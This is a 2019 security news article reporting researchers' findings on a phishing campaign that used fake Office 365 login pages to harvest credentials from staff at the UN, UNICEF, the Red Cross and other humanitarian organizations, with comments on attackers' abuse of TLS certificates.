searchtwitterarrow rightmail strokearrow leftmail solidfacebooklinkedinplusangle upmagazine plus
Help Net Security - Daily information security news with a focus on enterprise security.
  • News
  • Features
  • Expert analysis
  • Videos
  • Reviews
  • Events
  • Reports
  • Whitepapers
  • Industry news
  • Product showcase
  • Newsletters
  • (IN)SECURE Magazine
Zeljka Zorz
Zeljka Zorz, Managing Editor, Help Net Security
October 25, 2019
Share

Phishers have been targeting UN, UNICEF, Red Cross officials for months – and still do

Researchers have brought to light a longstanding phishing campaign aimed at the UN and its various networks, and a variety of humanitarian organizations, NGOs, universities and think tanks.

phishing UN

Some of these phishing pages are still up and are still not flagged as malicious by Google Safe Browsing, they warned.

The campaign is ongoing

The targeted organizations include the UN and its World Food Programme and Development Programme, UNICEF, the Heritage Foundation (an American conservative think tank), the International Federation of the Red Cross and Red Crescent Societies, the United States Institute of Peace (an independent, federal institution that provides analysis of and is involved in conflicts around the world), Concern Worldwide (Ireland’s largest aid and humanitarian agency), and many others.

The phishing pages are made to look like the organizations’ Office 365 login page for employees, as compromised Office 365 credentials provide attackers an entry point into organizations and enable them to launch stealthy insider attacks and collect sensitive information.

The phishing pages have key logging functionality embedded in the password field, so that everything entered into that field is sent to a C&C server, even if the potential victim fails to press the login button. Also, they are able to detect mobile visitors and present them with a mobile-friendly version.

“Mobile web browsers also unintentionally help obfuscate phishing URLs by truncating them, making it harder for the victims to discover the deception,” Lookout researcher Jeremy Richards has pointed out.

The researchers found that the infrastructure connected to these attacks has been live since March 2019 and the pages were/are hosted on two domains.

“SSL certificates used by the phishing infrastructure had two main ranges of validity: May 5, 2019 to August 3, 2019, and June 5, 2019 to September 3, 2019. Currently six certificates are still valid, and Lookout suspects that these attacks may still be ongoing,” Richards noted (though since the publication of their findings the sites with valid certificates have all become unavailable.)

Kevin Bocek, VP security strategy & threat intelligence, Venafi, noted that phishers are taking advantage of the implicit trust users have in the green padlock created by TLS certificates.

“Internet users have been trained to look for a green padlock when they visit websites, and bad actors are using SSL/TLS certificates to impersonate all kinds of organizations. This may appear sophisticated, but these kinds of phishing attacks are very common. For example, in 2017, security researchers uncovered over 15,000 certificates containing the word ‘PayPal’ that were being used in attacks. And in June 2019, the FBI issued a warning stating that the green padlock on websites doesn’t mean the domain is trustworthy and safe from cyber criminals,” he added.

There’s no mention of who might be behind the attacks. State-sponsored hackers who are after sensitive information seem like the most likely culprit, though charities and humanitarian organizations are also often targeted by scammers who are after money, so who knows?




More about
  • account hijacking
  • Lookout
  • Office 365
  • phishing
Share this

Featured news

  • VMware issues critical fixes, CISA orders federal agencies to act immediately (CVE-2022-22972)
  • Many security engineers are already one foot out the door. Why?
  • Fix your IT weak spots to guarantee compliance
Easily migrate to the cloud with CIS Hardened Images

What's new

Two business-grade Netgear VPN routers have security vulnerabilities that can’t be fixed

New infosec products of the week: May 20, 2022

Record level of bad bot traffic contributing to rise of online fraud

Email is the riskiest channel for data security

Don't miss

Two business-grade Netgear VPN routers have security vulnerabilities that can’t be fixed

How to ensure that the smart home doesn’t jeopardize data privacy?

U.S. DOJ will no longer prosecute good-faith security researchers under CFAA

VMware issues critical fixes, CISA orders federal agencies to act immediately (CVE-2022-22972)

Many security engineers are already one foot out the door. Why?

Help Net Security - Daily information security news with a focus on enterprise security.
Follow us
  • Features
  • News
  • Expert Analysis
  • Reviews
  • Events
  • Reports
  • Whitepapers
  • Industry news
  • Newsletters
  • Product showcase
  • Twitter

In case you’ve missed it

  • Data centers on steel wheels: Can we trust the safety of the railway infrastructure?
  • Good end user passwords begin with a well-enforced password policy
  • Keep your digital banking safe: Tips for consumers and banks
  • Is cybersecurity talent shortage a myth?

(IN)SECURE Magazine ISSUE 71 (March 2022)

  • Why security strategies need a new perspective
  • The evolution of security analytics
  • Open-source code: How to stay secure while moving fast
Read online
© Copyright 1998-2022 by Help Net Security
Read our privacy policy | About us | Advertise